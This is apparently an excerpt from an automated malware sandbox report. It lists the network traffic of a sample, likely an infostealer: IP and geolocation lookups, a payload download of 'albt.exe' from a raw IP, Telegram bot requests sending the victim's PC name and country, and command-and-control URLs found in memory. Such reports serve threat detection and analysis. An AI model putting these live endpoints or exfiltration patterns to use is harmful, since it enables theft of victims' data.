          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49754 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49773 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49789 version: TLS 1.0
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
          Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2006/01/2025%20/%2015:16:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2006/01/2025%20/%2015:55:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2006/01/2025%20/%2018:43:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /albt.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 147.124.216.113
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: amazonenviro.com
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficDNS traffic detected: DNS query: mail.irco.com.sa
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 06 Jan 2025 06:53:40 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 06 Jan 2025 06:53:52 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 06 Jan 2025 06:54:00 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: npratlsN.pif, 00000008.00000002.3076785533.0000000028C89000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028B72000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.000000003438B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
          Source: npratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
          Source: npratlsN.pif, 00000008.00000002.3076785533.0000000028AA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.0000000034231000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000208E1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
          Source: npratlsN.pif, 00000008.00000002.3076785533.0000000028AA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.0000000034231000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000208E1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
          Source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
          Source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
